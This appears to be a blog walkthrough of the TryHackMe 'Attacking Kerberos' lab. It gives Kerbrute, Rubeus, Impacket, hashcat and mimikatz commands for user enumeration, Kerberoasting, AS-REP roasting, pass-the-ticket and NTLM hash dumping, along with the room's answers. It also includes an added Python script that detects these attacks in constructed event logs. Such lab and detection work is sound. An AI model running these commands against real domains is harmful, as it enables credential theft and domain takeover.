The Dutch Hacker
Attacking Kerberos tryhackme

Attacking Kerberos

This is the write-up for the room Attacking Kerberos on TryHackMe; it is part of the CompTIA Pentest+ path.

Connect with the VPN or use the AttackBox on the TryHackMe site to reach the TryHackMe lab environment.

Task Attacking Kerberos

Task 1

Start the machine, then read everything in the task, and let’s start attacking Kerberos.

1.1 What does TGT stand for?

A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain.

Answer: Ticket Granting Ticket

1.2 What does SPN stand for?

A Service Principal Name is an identifier given to a service instance to associate a service instance with a domain service account. Windows requires that services have a domain service account which is why a service needs an SPN set.

Answer: Service Principal Name

1.3 What does PAC stand for?

Privilege Attribute Certificate (PAC) – The PAC holds all of the user’s relevant information; it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.

Answer: Privilege Attribute Certificate

1.4 What two services make up the KDC?

The Key Distribution Center is a service for issuing TGTs and service tickets; it consists of the Authentication Service and the Ticket Granting Service.

Answer: AS, TGS

Note the space after the comma.

Task 2

As always when dealing with an Active Directory environment, we first add the machine name to our hosts file

nano /etc/hosts

Installing Kerbrute

Download the file from the GitHub releases page: Releases · ropnop/kerbrute · GitHub

Open a terminal and make the file executable by typing

chmod +x filename

You can rename the file to kerbrute for easy use. Copy the file into your /opt directory by typing in

mkdir /opt/kerbrute
cp kerbrute_linux_amd64 /opt/kerbrute/kerbrute  

Now you can always find it in your /opt directory.

Now download the User.txt file provided in this task by entering the following command

wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/User.txt

Let’s start the brute force of user accounts by typing in the following command

/opt/kerbrute/kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt -t 100

2.1 How many total users do we enumerate?

Answer: 10

2.2 What is the SQL service account name?

Answer: sqlservice

2.3 What is the second “machine” account name?

Answer: machine2

2.4 What is the third “user” account name?

Answer: user3

Task 3

SSH into the machine to complete this task

ssh administrator@<Machine_IP>
cd Downloads
dir

Now we can harvest the tickets by entering the following command

Rubeus.exe harvest /interval:30

3.1 Which domain admin do we get a ticket for when harvesting tickets?

Answer: Administrator

3.2 Which domain controller do we get a ticket for when harvesting tickets?


Computer accounts always end with a $ sign.

Answer: CONTROLLER-a$

Task 4

Remember this: if the service has a registered SPN then it can be Kerberoastable.

We still have the ssh session open. Type in the following

Rubeus.exe kerberoast

We now see the hashes of two service accounts. We can copy these hashes and crack them with hashcat. This attack requires Rubeus.exe to be on the machine; with Impacket we can do the same remotely, but we need a credential to do so.

Installing impacket

Install Impacket by entering the following commands

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install
cd /opt/impacket/examples

Now enter the command (change the IP to that of your deployed machine)

sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.142.212 -request

We now also see the two service accounts with their hashes


Now save both hashes, each in a different file

Now download the password list provided in the task by entering the command

wget https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt

4.1 What is the HTTPService Password?

Now that we have the hashes, we can crack them

hashcat -m 13100 -a 0 httphash.txt Pass.txt

You can find the password in the blue area

4.2 What is the SQLService Password?

hashcat -m 13100 -a 0 sqlhash.txt Pass.txt

You can find the password in the blue area

Task 5

SSH back into the deployed machine

ssh administrator@MACHINE_IP

The credentials are in Task 3

Once connected enter the following commands

cd Downloads
Rubeus.exe asreproast

This will spit out 2 hashes

Attacking Kerberos tryhackme

Copy those hashes into a file on your Linux machine; name the file after the found username followed by .txt

Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User…..

Make sure there are no spaces when saving it to the .txt file

5.1 What hash type does AS-REP Roasting use?

To find this one, look at the hashcat command we are using. It has -m 18200, meaning it is using hash mode 18200. You can find all hash modes on the hashcat wiki page or with the man hashcat command

Answer: Kerberos 5 AS-REP etype 23

5.2 Which User is vulnerable to AS-REP Roasting?

Answer: user 3

5.3 What is the User’s Password?

Type in the following command

hashcat -m 18200 user3.txt Pass.txt

5.4 What is the Admin’s Password?

Type in the following command

hashcat -m 18200 Admin2.txt Pass.txt
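Seen from the domain controller, the three techniques used so far each leave a distinct footprint in the Security log. The following is an added example for this write-up, not code from TryHackMe or from Kerbrute, Rubeus, Impacket or hashcat: three detection rules run over constructed event records whose keys mirror the fields of event 4768 (a TGT was requested) and 4769 (a service ticket was requested). Kerbrute's userenum from Task 2 shows up as a burst of 4768 failures with Status 0x6 (client not found in the Kerberos database) for many different names from one address; the Kerberoasting of Task 4 as 4769 requests for RC4 (0x17) tickets to user service accounts; the AS-REP roasting of Task 5 as a 4768 success with Pre-Authentication Type 0. All addresses, user names and timestamps in the sample are made up.

```python
"""Detection logic for the three Kerberos techniques in this write-up, run over
constructed Windows Security events: Kerbrute user enumeration (Task 2),
Kerberoasting (Task 4) and AS-REP roasting (Task 5).

Added example for this write-up; not code from TryHackMe or from any tool the room
uses. The event records are constructed dicts whose keys mirror the fields of
Security events 4768 and 4769; addresses and user names are made up.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"           # TicketEncryptionType for RC4-HMAC (AES is 0x11 / 0x12)
PRINCIPAL_UNKNOWN = "0x6"   # 4768 Status: client not found in Kerberos database
NO_PREAUTH = "0"            # 4768 PreAuthType: logon without pre-authentication
SUCCESS = "0x0"


def detect_user_enumeration(events, window=timedelta(seconds=60), threshold=5):
    """Task 2 footprint: one client address producing 4768 failures with Status 0x6
    for many *different* user names inside a short window."""
    per_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == PRINCIPAL_UNKNOWN:
            per_ip[e["IpAddress"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["TargetUserName"]))
    hits = []
    for ip, attempts in per_ip.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            names = {name for t, name in attempts[i:] if t - start <= window}
            if len(names) >= threshold:
                hits.append({"ip": ip, "distinct_names": len(names),
                             "first_seen": start.isoformat()})
                break
    return hits


def detect_kerberoast(events):
    """Task 4 footprint: successful 4769 requests for an RC4-encrypted service ticket
    to a user (non-$) service account. krbtgt and computer accounts are excluded:
    computer accounts have long random passwords, so RC4 tickets for them are not
    what a roaster is after."""
    hits = []
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != SUCCESS:
            continue
        svc = e["ServiceName"]
        if (e["TicketEncryptionType"] == RC4_HMAC
                and not svc.endswith("$") and svc.lower() != "krbtgt"):
            hits.append({"requester": e["TargetUserName"], "service": svc, "ip": e["IpAddress"]})
    return hits


def detect_asrep_roast(events):
    """Task 5 footprint: a 4768 success with PreAuthType 0, i.e. a TGT issued to an
    account that does not require Kerberos pre-authentication. The ticket encryption
    type is reported alongside so an RC4 reply stands out."""
    return [
        {"user": e["TargetUserName"], "ip": e["IpAddress"], "etype": e["TicketEncryptionType"]}
        for e in events
        if e["EventID"] == 4768 and e["Status"] == SUCCESS and e["PreAuthType"] == NO_PREAUTH
    ]


def event(event_id, time, ip, user, service="krbtgt", etype="0x12", status=SUCCESS, preauth="2"):
    """Build one constructed record with the field names of 4768/4769."""
    return {"EventID": event_id, "TimeCreated": time, "IpAddress": ip, "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype, "Status": status,
            "PreAuthType": preauth}


# Constructed sample: one noisy client (10.10.14.5) and one benign client (10.10.14.7).
SAMPLE_EVENTS = [
    # six unknown names from one address within ten seconds (Kerbrute-style enumeration)
    *[event(4768, f"2024-01-01T10:00:{i:02d}", "10.10.14.5", f"guess{i:02d}", status="0x6")
      for i in range(6)],
    # RC4 service ticket for a user service account (Kerberoast)
    event(4769, "2024-01-01T10:05:00", "10.10.14.5", "Machine1@CONTROLLER.LOCAL",
          service="sqlservice", etype="0x17"),
    # benign: AES ticket for a computer account, RC4 TGS for krbtgt
    event(4769, "2024-01-01T10:05:01", "10.10.14.7", "user1@CONTROLLER.LOCAL", service="CONTROLLER-1$"),
    event(4769, "2024-01-01T10:05:02", "10.10.14.7", "user1@CONTROLLER.LOCAL", service="krbtgt", etype="0x17"),
    # TGT issued without pre-authentication (AS-REP roast)
    event(4768, "2024-01-01T10:06:00", "10.10.14.5", "user3", etype="0x17", preauth="0"),
    # benign: ordinary TGT with pre-authentication
    event(4768, "2024-01-01T10:06:01", "10.10.14.7", "Administrator"),
]


def run_all(events=SAMPLE_EVENTS):
    return {"enumeration": detect_user_enumeration(events),
            "kerberoast": detect_kerberoast(events),
            "asrep_roast": detect_asrep_roast(events)}


if __name__ == "__main__":
    for rule, findings in run_all().items():
        print(rule, findings)
```

The thresholds are deliberately simple: a window of 60 seconds and five distinct names for enumeration, and no rate limit at all for the two roasting rules, because a single RC4 service ticket for a user account or a single no-pre-auth TGT is already worth a look in a domain where RC4 and DoesNotRequirePreAuth have been switched off. Tune them against your own baseline before alerting on them.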

Task 6

Follow along with the guide in this task

To recap

Log in with SSH to the deployed machine and run the following commands

cd Downloads
mimikatz.exe
privilege::debug
sekurlsa::tickets /export

To use the exported ticket and log in, we can use
kerberos::ptt <ticket>

Task 7

Read all that is in the task and try to follow along

7.1 What is the SQLService NTLM Hash?

While still connected with SSH, type in the following command

lsadump::lsa /inject /name:sqlservice

7.2 What is the Administrator NTLM Hash?

While still connected with SSH, type in the following command

lsadump::lsa /inject /name:Administrator

Task 8

Read all that is in the task and press complete

Task 9

Read all that is in the task and press complete
